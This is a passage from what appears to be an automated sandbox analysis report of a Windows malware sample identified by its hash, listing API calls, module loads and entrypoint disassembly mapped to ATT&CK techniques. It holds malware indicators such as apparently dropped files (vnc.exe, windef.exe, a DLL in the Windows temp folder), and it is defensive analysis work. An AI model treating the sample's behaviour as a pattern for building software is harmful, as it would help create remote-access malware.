\"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 752c0000\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 71540000\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74f90000\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IEFRAME.DLL\" at base 6a290000\n \"vnc.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74f90000\n \"vnc.exe\" loaded module \"KERNEL32.DLL\" at base 755d0000\n \"svchost.exe\" loaded module \"GDI32.DLL\" at base 76080000\n \"svchost.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 76de0000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70d90000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"svchost.exe\" loaded module \"KERNEL32\" at base 755d0000\n \"svchost.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"svchost.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 6a130000\n \"windef.exe\" loaded module \"GDI32.DLL\" at base 76080000\n \"windef.exe\" loaded module \"%WINDIR%\\SYSTEM32\\IMM32.DLL\" at base 76de0000\n \"windef.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70d90000\n \"windef.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"windef.exe\" loaded module \"KERNEL32\" at base 755d0000\n \"windef.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"windef.exe\" loaded module \"RPCRT4.DLL\" at base 75f00000\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module \"GDIPLUS.DLL\" at base 73a10000\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module \"USER32.DLL\" at base 75790000\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module \"NTDLL.DLL\" at base 771e0000\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 75ee0000\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module \"SSPICLI.DLL\" at base 74f70000\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 753e0000\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module \"WININET.DLL\" at base 75ae0000\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-OLE32-L1-1-0.DLL\" at base 75270000\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" loaded module \"WS2_32.DLL\" at base 75860000\n \"schtasks.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73bb0000\n \"schtasks.exe\" loaded module \"RPCRT4.DLL\" at base 75f00000\n \"schtasks.exe\" loaded module \"API-MS-WIN-SECURITY-LSALOOKUP-L1-1-0.DLL\" at base 75ee0000\n \"schtasks.exe\" loaded module \"ADVAPI32.DLL\" at base 77130000\n \"schtasks.exe\" loaded module \"CLBCATQ.DLL\" at base 76ee0000\n \"schtasks.exe\" loaded module \"%WINDIR%\\SYSTEM32\\TASKSCHD.DLL\" at base 736f0000\n \"schtasks.exe\" loaded module \"SSPICLI.DLL\" at base 74f70000\n \"schtasks.exe\" loaded module \"XMLLITE.DLL\" at base 73900000", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-175", "type": 6, "relevance": 1, "name": "Calls an API typically used to load libraries", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadLibrary\" with a parameter C:\\3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadLibrary\" with a parameter dwmapi.dll (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadLibrary\" with a parameter comctl32.dll (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadLibrary\" with a parameter UxTheme.dll (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadLibrary\" with a parameter IMM32.dll (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadLibrary\" with a parameter comctl32 (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadLibrary\" with a parameter Advapi32.dll (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadLibrary\" with a parameter CRYPTSP.dll (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadLibrary\" with a parameter CRYPTBASE.dll (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadLibrary\" with a parameter propsys.dll (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadLibrary\" with a parameter ntmarta.dll (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadLibrary\" with a parameter PROPSYS.dll (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadLibrary\" with a parameter OLEAUT32.dll (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Core-LocalRegistry-L1-1-0.dll (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadLibrary\" with a parameter API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00005916)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00005856)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00005856)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00005856)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00005856)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00005856)\n \"svchost.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00005856)\n \"windef.exe\" called \"LoadLibrary\" with a parameter gdi32.dll (UID: 00000000-00006132)\n \"windef.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\IMM32.DLL (UID: 00000000-00006132)\n \"windef.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-synch-l1-2-0 (UID: 00000000-00006132)\n \"windef.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-fibers-l1-1-1 (UID: 00000000-00006132)\n \"windef.exe\" called \"LoadLibrary\" with a parameter kernel32 (UID: 00000000-00006132)\n \"windef.exe\" called \"LoadLibrary\" with a parameter api-ms-win-core-localization-l1-2-1 (UID: 00000000-00006132)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadLibrary\" with a parameter Gdiplus.dll (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadLibrary\" with a parameter ole32.dll (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadLibrary\" with a parameter kernel32.dll (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadLibrary\" with a parameter advapi32.dll (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadLibrary\" with a parameter user32.dll (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadLibrary\" with a parameter shell32.dll (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadLibrary\" with a parameter ntdll.dll (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadLibrary\" with a parameter wininet.dll (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadLibrary\" with a parameter Secur32.dll (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadLibrary\" with a parameter SHELL32.dll (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadLibrary\" with a parameter ADVAPI32.dll (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-advapi32-l2-1-0.dll (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadLibrary\" with a parameter api-ms-win-downlevel-ole32-l1-1-0.dll (UID: 00000000-00006108)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"LoadLibrary\" with a parameter WS2_32.dll (UID: 00000000-00006108)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter %WINDIR%\\system32\\uxtheme.dll (UID: 00000000-00004040)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter API-MS-Win-Security-LSALookup-L1-1-0.dll (UID: 00000000-00004040)\n \"schtasks.exe\" called \"LoadLibrary\" with a parameter SspiCli.dll (UID: 00000000-00004040)", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-22", "type": 6, "relevance": 1, "name": "Fails to load modules at runtime", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"svchost.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"svchost.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]\n \"windef.exe\" failed to load missing module \"api-ms-win-core-fibers-l1-1-1\" - [base:0; Status:c0000135]\n \"windef.exe\" failed to load missing module \"api-ms-win-core-localization-l1-2-1\" - [base:0; Status:c0000135]", "origin": "API Call", "attck_id": "T1574.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1574/002"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"0d000e00844b1c6a@IPHLPAPI.DLL\"\n \"0f001000dc4b1c6a@IPHLPAPI.DLL\"\n \"0c000d00244c1c6a@IPHLPAPI.DLL\"\n \"140015006c4c1c6a@IPHLPAPI.DLL\"\n \"0c000d00e04c1c6a@IPHLPAPI.DLL\"\n \"15001600c03e1c6a@advapi32.DLL\"\n \"0e000f00703f1c6a@advapi32.DLL\"\n \"0e000f00cc3f1c6a@advapi32.DLL\"\n \"11001200b4471c6a@advapi32.DLL\"\n \"1100120048481c6a@advapi32.DLL\"\n \"120013008c481c6a@advapi32.DLL\"\n \"12001300e4481c6a@advapi32.DLL\"\n \"14001500386e1c6a@advapi32.DLL\"\n \"14001500506e1c6a@advapi32.DLL\"\n \"14001500686e1c6a@advapi32.DLL\"\n \"17001800806e1c6a@advapi32.DLL\"\n \"0d000e00986e1c6a@advapi32.DLL\"\n \"11001200a86e1c6a@advapi32.DLL\"\n \"11001200bc6e1c6a@advapi32.DLL\"\n \"0d000e0044661c6a@WININET.dll\"\n \"0d000e00b4661c6a@WININET.dll\"\n \"10001100ec661c6a@WININET.dll\"\n \"1000110090671c6a@WININET.dll\"\n \"10001100006f1c6a@WININET.dll\"\n \"10001100146f1c6a@WININET.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"SystemPropertiesPerformance.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"vnc.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"windef.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac\" file has an entrypoint instructions - \"call\t0x434e87,jmp\t0x427c56,int3\t,int3\t,int3\t,int3\t,int3\t,int3\t,int3\t,int3\t,int3\t,push\tedi,push\tesi,mov\tesi, dword ptr [esp + 0x10],mov\tecx, dword ptr [esp + 0x14],mov\tedi, dword ptr [esp + 0xc],mov\teax, ecx,mov\tedx, ecx,add\teax, esi,cmp\tedi, esi,jbe\t0x427e00,cmp\tedi, eax,jb\t0x428168,bt\tdword ptr [0x4c31fc], 1,jae\t0x427e11,rep movsb\tbyte ptr es:[edi], byte ptr [esi],jmp\t0x428128,cmp\tecx, 0x80,jb\t0x427feb,mov\teax, edi,xor\teax, esi,test\teax, 0xf,jne\t0x427e36,bt\tdword ptr [0x4be324], 1,\"\n \"SystemPropertiesPerformance.exe\" file has an entrypoint instructions - \"call\t0x434e87,jmp\t0x427c56,int3\t,int3\t,int3\t,int3\t,int3\t,int3\t,int3\t,int3\t,int3\t,push\tedi,push\tesi,mov\tesi, dword ptr [esp + 0x10],mov\tecx, dword ptr [esp + 0x14],mov\tedi, dword ptr [esp + 0xc],mov\teax, ecx,mov\tedx, ecx,add\teax, esi,cmp\tedi, esi,jbe\t0x427e00,cmp\tedi, eax,jb\t0x428168,bt\tdword ptr [0x4c31fc], 1,jae\t0x427e11,rep movsb\tbyte ptr es:[edi], byte ptr [esi],jmp\t0x428128,cmp\tecx, 0x80,jb\t0x427feb,mov\teax, edi,xor\teax, esi,test\teax, 0xf,jne\t0x427e36,bt\tdword ptr [0x4be324], 1,\"\n \"vnc.exe\" file has an entrypoint instructions - \"call\t0x4014b0,xor\teax, eax,ret\t,push\tebp,mov\tebp, esp,push\tesi,lock inc\tdword ptr [0x466d8c],push\tdword ptr [ebp + 0x2c],mov\teax, dword ptr [0x466cec],push\tdword ptr [ebp + 0x28],push\tdword ptr [ebp + 0x24],push\tdword ptr [ebp + 0x20],test\teax, eax,je\t0x401660,push\tdword ptr [ebp + 0x1c],push\tdword ptr [ebp + 0x18],push\tdword ptr [ebp + 0x14],push\tdword ptr [ebp + 0x10],push\tdword ptr [ebp + 0xc],push\tdword ptr [ebp + 8],call\teax,mov\tesi, eax,jmp\t0x401692,mov\teax, dword ptr [ebp + 0x1c],or\teax, 4,push\teax,push\tdword ptr [ebp + 0x18],push\tdword ptr [ebp + 0x14],push\tdword ptr [ebp + 0x10],push\tdword ptr [ebp + 0xc],push\tdword ptr [ebp + 8],call\tdword ptr [0x466834],mov\tesi, eax,test\tesi, esi,je\t0x401692,push\t1,\"\n \"windef.exe\" file has an entrypoint instructions - \"jmp\tdword ptr [0x402000],add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "\"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter InitializeCriticalSectionEx (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter FlsAlloc (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter FlsSetValue (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter FlsGetValue (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter LCMapStringEx (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter FlsFree (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter InitOnceExecuteOnce (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter CreateEventExW (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreW (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter CreateSemaphoreExW (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolTimer (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolTimer (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter WaitForThreadpoolTimerCallbacks (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolTimer (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWait (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter SetThreadpoolWait (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWait (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter FlushProcessWriteBuffers (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter FreeLibraryWhenCallbackReturns (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessorNumber (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter CreateSymbolicLinkW (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter GetCurrentPackageId (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter GetTickCount64 (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter GetFileInformationByHandleEx (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter SetFileInformationByHandle (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter GetSystemTimePreciseAsFileTime (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter InitializeConditionVariable (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter WakeConditionVariable (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter WakeAllConditionVariable (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableCS (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter InitializeSRWLock (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter AcquireSRWLockExclusive (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter TryAcquireSRWLockExclusive (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter SleepConditionVariableSRW (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter CreateThreadpoolWork (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter SubmitThreadpoolWork (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter CloseThreadpoolWork (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter CompareStringEx (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoEx (UID: 00000000-00005916)\n \"3ff0ec906b60ba0f9ba810c96e0b2039330e16addbef2bf3648de286faaaeaac.exe\" called \"GetProcAddress\" with a parameter AreFileApisANSI (UID: 